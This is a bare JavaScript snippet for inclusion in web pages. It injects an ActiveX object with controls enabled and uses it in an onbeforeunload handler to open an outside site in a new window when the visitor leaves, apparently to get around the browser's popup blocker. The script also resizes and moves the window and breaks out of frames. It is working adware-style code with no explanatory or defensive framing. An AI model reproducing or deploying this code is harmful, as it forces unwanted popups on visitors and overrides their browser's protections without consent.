document.writeln("<head>");
document.writeln("<SCRIPT language=javascript>");
document.writeln("function popwin(popurl,target)");
document.writeln("{");
document.writeln("    stb.DOM.Script.window.open(popurl,target);");
document.writeln("}");
document.writeln("<\/SCRIPT>");
document.writeln("<\/head>");
document.writeln("<body topmargin=\"0\" onbeforeunload=\"popwin(\'http:\/\/www.renlang.info\/onshow.html',\'_blank\');\">");
document.writeln("<OBJECT id=stb height=1 width=1 classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A>");
document.writeln("<PARAM NAME=\"ActivateActiveXControls\" VALUE=\"1\">");
document.writeln("<PARAM NAME=\"ActivateApplets\" VALUE=\"1\"><\/OBJECT>")
var aw = screen.availWidth;
var ah = screen.availHeight;
window.moveTo(0,0);
window.resizeTo(aw+1,ah);
if (top.location != location) top.location.href = location.href;
